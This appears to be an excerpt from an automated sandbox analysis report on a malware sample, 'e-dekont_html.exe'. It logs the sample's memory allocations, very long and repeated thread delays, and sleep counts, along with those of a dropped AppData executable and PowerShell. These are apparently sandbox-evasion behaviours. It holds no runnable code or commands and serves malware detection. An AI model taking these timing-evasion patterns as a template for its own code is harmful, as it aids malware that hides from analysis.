Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Memory allocated: AE40000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Memory allocated: BE40000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Memory allocated: CE40000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Memory allocated: EB0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Memory allocated: 2980000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Memory allocated: 26D0000 memory reserve \| memory write watch

Source: C:\Users\user\Desktop\e-dekont_html.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Thread delayed: delay time: 599641	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Thread delayed: delay time: 599531	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Thread delayed: delay time: 599422	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Thread delayed: delay time: 599311	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Thread delayed: delay time: 599203	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Thread delayed: delay time: 599094	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Thread delayed: delay time: 598985	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Thread delayed: delay time: 598860	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Thread delayed: delay time: 598639	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Thread delayed: delay time: 598516	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Thread delayed: delay time: 598407	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Thread delayed: delay time: 598282	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Thread delayed: delay time: 598157	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Thread delayed: delay time: 598032	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Thread delayed: delay time: 597922	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Thread delayed: delay time: 597813	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Thread delayed: delay time: 597688	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Thread delayed: delay time: 597563	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Thread delayed: delay time: 597438	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Thread delayed: delay time: 597297	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Thread delayed: delay time: 597188	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Thread delayed: delay time: 597063	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Thread delayed: delay time: 596938	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Thread delayed: delay time: 596813	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Thread delayed: delay time: 596688	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Thread delayed: delay time: 596578	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Thread delayed: delay time: 596465	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Thread delayed: delay time: 596324	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Thread delayed: delay time: 596094	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Thread delayed: delay time: 595891	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Thread delayed: delay time: 595780	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Thread delayed: delay time: 595672	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Thread delayed: delay time: 595562	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Thread delayed: delay time: 595454	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Thread delayed: delay time: 595329	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Thread delayed: delay time: 595204	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Thread delayed: delay time: 595079	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Thread delayed: delay time: 594954	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Thread delayed: delay time: 594829	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Thread delayed: delay time: 594704	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Thread delayed: delay time: 594579	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Thread delayed: delay time: 594454	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Thread delayed: delay time: 594329	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Thread delayed: delay time: 594204	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Thread delayed: delay time: 594079	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Thread delayed: delay time: 593954	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Thread delayed: delay time: 593829	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Thread delayed: delay time: 593704	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Thread delayed: delay time: 593579	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Thread delayed: delay time: 593454	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Thread delayed: delay time: 599422
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Thread delayed: delay time: 599313
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Thread delayed: delay time: 599188
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Thread delayed: delay time: 599078
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Thread delayed: delay time: 598969
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Thread delayed: delay time: 598844
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Thread delayed: delay time: 598735
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Thread delayed: delay time: 598610
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Thread delayed: delay time: 598485
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Thread delayed: delay time: 598360
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Thread delayed: delay time: 598235
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Thread delayed: delay time: 598110
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Thread delayed: delay time: 597985
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Thread delayed: delay time: 597860
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Thread delayed: delay time: 597735
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Thread delayed: delay time: 597610
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Thread delayed: delay time: 597485
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Thread delayed: delay time: 597360
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Thread delayed: delay time: 597235
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Thread delayed: delay time: 597110
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Thread delayed: delay time: 596985
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Thread delayed: delay time: 596858
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Thread delayed: delay time: 596750
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Thread delayed: delay time: 596641
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Thread delayed: delay time: 596531
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Thread delayed: delay time: 596422
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Thread delayed: delay time: 596313
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Thread delayed: delay time: 596188
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Thread delayed: delay time: 596079
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Thread delayed: delay time: 595954
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Thread delayed: delay time: 595829
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Thread delayed: delay time: 595704
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Thread delayed: delay time: 595579
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Thread delayed: delay time: 595454
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Thread delayed: delay time: 595329
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Thread delayed: delay time: 595204
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Thread delayed: delay time: 595079
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Thread delayed: delay time: 594709
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Thread delayed: delay time: 594580
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Thread delayed: delay time: 594454
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Thread delayed: delay time: 594329
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Thread delayed: delay time: 594204
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Thread delayed: delay time: 594079
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Thread delayed: delay time: 593954
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Thread delayed: delay time: 593829
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Thread delayed: delay time: 593704
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Thread delayed: delay time: 593579
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Thread delayed: delay time: 593339
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Thread delayed: delay time: 593219

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8083	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1052	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6516	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1183	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Window / User API: threadDelayed 3996	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Window / User API: threadDelayed 5804	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Window / User API: threadDelayed 2932
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Window / User API: threadDelayed 6891

Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 7648	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8020	Thread sleep count: 8083 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1836	Thread sleep time: -5534023222112862s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8020	Thread sleep count: 1052 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8136	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2460	Thread sleep time: -3689348814741908s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8176	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 2132	Thread sleep count: 32 > 30	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 2132	Thread sleep time: -29514790517935264s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 2132	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 7516	Thread sleep count: 3996 > 30	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 2132	Thread sleep time: -599875s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 7516	Thread sleep count: 5804 > 30	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 2132	Thread sleep time: -599766s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 2132	Thread sleep time: -599641s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 2132	Thread sleep time: -599531s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 2132	Thread sleep time: -599422s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 2132	Thread sleep time: -599311s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 2132	Thread sleep time: -599203s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 2132	Thread sleep time: -599094s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 2132	Thread sleep time: -598985s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 2132	Thread sleep time: -598860s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 2132	Thread sleep time: -598639s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 2132	Thread sleep time: -598516s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 2132	Thread sleep time: -598407s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 2132	Thread sleep time: -598282s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 2132	Thread sleep time: -598157s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 2132	Thread sleep time: -598032s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 2132	Thread sleep time: -597922s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 2132	Thread sleep time: -597813s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 2132	Thread sleep time: -597688s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 2132	Thread sleep time: -597563s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 2132	Thread sleep time: -597438s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 2132	Thread sleep time: -597297s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 2132	Thread sleep time: -597188s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 2132	Thread sleep time: -597063s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 2132	Thread sleep time: -596938s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 2132	Thread sleep time: -596813s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 2132	Thread sleep time: -596688s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 2132	Thread sleep time: -596578s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 2132	Thread sleep time: -596465s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 2132	Thread sleep time: -596324s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 2132	Thread sleep time: -596094s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 2132	Thread sleep time: -595891s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 2132	Thread sleep time: -595780s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 2132	Thread sleep time: -595672s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 2132	Thread sleep time: -595562s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 2132	Thread sleep time: -595454s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 2132	Thread sleep time: -595329s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 2132	Thread sleep time: -595204s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 2132	Thread sleep time: -595079s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 2132	Thread sleep time: -594954s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 2132	Thread sleep time: -594829s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 2132	Thread sleep time: -594704s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 2132	Thread sleep time: -594579s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 2132	Thread sleep time: -594454s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 2132	Thread sleep time: -594329s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 2132	Thread sleep time: -594204s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 2132	Thread sleep time: -594079s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 2132	Thread sleep time: -593954s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 2132	Thread sleep time: -593829s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 2132	Thread sleep time: -593704s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 2132	Thread sleep time: -593579s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 2132	Thread sleep time: -593454s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe TID: 7388	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe TID: 7796	Thread sleep count: 33 > 30
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe TID: 7796	Thread sleep time: -30437127721620741s >= -30000s
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe TID: 7796	Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe TID: 8116	Thread sleep count: 2932 > 30
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe TID: 7796	Thread sleep time: -599422s >= -30000s
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe TID: 7796	Thread sleep time: -599313s >= -30000s
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe TID: 7796	Thread sleep count: 31 > 30
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe TID: 7796	Thread sleep time: -599188s >= -30000s
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe TID: 8116	Thread sleep count: 6891 > 30
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe TID: 7796	Thread sleep time: -599078s >= -30000s
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe TID: 7796	Thread sleep time: -598969s >= -30000s
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe TID: 7796	Thread sleep time: -598844s >= -30000s
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe TID: 7796	Thread sleep time: -598735s >= -30000s
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe TID: 7796	Thread sleep time: -598610s >= -30000s
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe TID: 7796	Thread sleep time: -598485s >= -30000s
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe TID: 7796	Thread sleep time: -598360s >= -30000s
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe TID: 7796	Thread sleep time: -598235s >= -30000s
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe TID: 7796	Thread sleep time: -598110s >= -30000s
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe TID: 7796	Thread sleep time: -597985s >= -30000s
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe TID: 7796	Thread sleep time: -597860s >= -30000s
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe TID: 7796	Thread sleep time: -597735s >= -30000s
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe TID: 7796	Thread sleep time: -597610s >= -30000s
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe TID: 7796	Thread sleep time: -597485s >= -30000s
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe TID: 7796	Thread sleep time: -597360s >= -30000s
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe TID: 7796	Thread sleep time: -597235s >= -30000s
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe TID: 7796	Thread sleep time: -597110s >= -30000s
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe TID: 7796	Thread sleep time: -596985s >= -30000s
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe TID: 7796	Thread sleep time: -596858s >= -30000s
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe TID: 7796	Thread sleep time: -596750s >= -30000s
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe TID: 7796	Thread sleep time: -596641s >= -30000s
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe TID: 7796	Thread sleep time: -596531s >= -30000s
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe TID: 7796	Thread sleep time: -596422s >= -30000s
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe TID: 7796	Thread sleep time: -596313s >= -30000s
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe TID: 7796	Thread sleep time: -596188s >= -30000s
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe TID: 7796	Thread sleep time: -596079s >= -30000s
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe TID: 7796	Thread sleep time: -595954s >= -30000s
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe TID: 7796	Thread sleep time: -595829s >= -30000s
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe TID: 7796	Thread sleep time: -595704s >= -30000s
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe TID: 7796	Thread sleep time: -595579s >= -30000s
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe TID: 7796	Thread sleep time: -595454s >= -30000s
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe TID: 7796	Thread sleep time: -595329s >= -30000s
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe TID: 7796	Thread sleep time: -595204s >= -30000s
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe TID: 7796	Thread sleep time: -595079s >= -30000s
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe TID: 7796	Thread sleep time: -594709s >= -30000s
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe TID: 7796	Thread sleep time: -594580s >= -30000s
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe TID: 7796	Thread sleep time: -594454s >= -30000s
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe TID: 7796	Thread sleep time: -594329s >= -30000s
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe TID: 7796	Thread sleep time: -594204s >= -30000s
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe TID: 7796	Thread sleep time: -594079s >= -30000s
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe TID: 7796	Thread sleep time: -593954s >= -30000s
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe TID: 7796	Thread sleep time: -593829s >= -30000s
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe TID: 7796	Thread sleep time: -593704s >= -30000s
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe TID: 7796	Thread sleep time: -593579s >= -30000s
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe TID: 7796	Thread sleep time: -593339s >= -30000s
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe TID: 7796	Thread sleep time: -593219s >= -30000s

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\e-dekont_html.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Thread delayed: delay time: 599641	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Thread delayed: delay time: 599531	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Thread delayed: delay time: 599422	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Thread delayed: delay time: 599311	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Thread delayed: delay time: 599203	Jump to behavior
